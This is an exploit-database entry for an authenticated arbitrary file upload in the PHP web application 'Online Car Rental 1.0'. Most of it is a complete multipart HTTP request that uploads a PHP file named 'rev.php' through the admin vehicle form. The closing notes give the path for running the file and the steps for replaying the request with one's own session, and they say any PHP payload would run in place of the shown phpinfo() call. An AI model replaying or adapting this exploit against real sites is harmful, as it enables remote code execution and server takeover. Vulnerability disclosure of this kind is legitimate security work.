## https://sploitus.com/exploit?id=PACKETSTORM:161358
# Exploit Title: Online Car Rental 1.0 | Authenticated (admin) arbitrary file upload leading to PHP code execution  
# Exploit Author: Richard Jones  
# Date: 2021/09/02  
# Vendor Homepage: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14145&title=Online+Car+Rental+System+Using+PHP%2FMySQL+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x86_64) + XAMPP 7.2.34  
  
  
  
POST /Online%20Car%20Rental/admin/post-avehical.php HTTP/1.1  
Host: TARGETURL  
Content-Type: multipart/form-data; boundary=---------------------------41518493223397502791049196241  
Content-Length: 1819  
Cookie: PHPSESSID=8ouf7h44qe55bk4eqai1p145o1  
Upgrade-Insecure-Requests: 1  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="vehicletitle"  
  
a  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="brandname"  
  
2  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="vehicalorcview"  
  
a  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="priceperday"  
  
1  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="fueltype"  
  
Petrol  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="modelyear"  
  
1  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="seatingcapacity"  
  
1  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img1"; filename="rev.php"  
Content-Type: application/octet-stream  
  
<?php phpinfo(); ?>  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img2"; filename="Untitled.png"  
Content-Type: image/png  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img3"; filename="Untitled.png"  
Content-Type: image/png  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img4"; filename="Untitled.png"  
Content-Type: image/png  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="img5"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------41518493223397502791049196241  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------41518493223397502791049196241--  
  
  
# The uploaded file keeps its original name and is served from the vehicle-image directory, so it can then be executed by requesting: http://TARGETURL/Online%20Car%20Rental/admin/img/vehicleimages/rev.php  
# Notes: the request above is sent to the /admin/ endpoint and carries a PHPSESSID cookie, so a valid admin session is required when replaying it; the PHPSESSID value and Content-Length must be replaced with ones matching your own session and body. The phpinfo() payload is a harmless proof of execution — any PHP placed in the img1 part would run the same way, so the application appears not to validate the extension or content of uploaded "images".  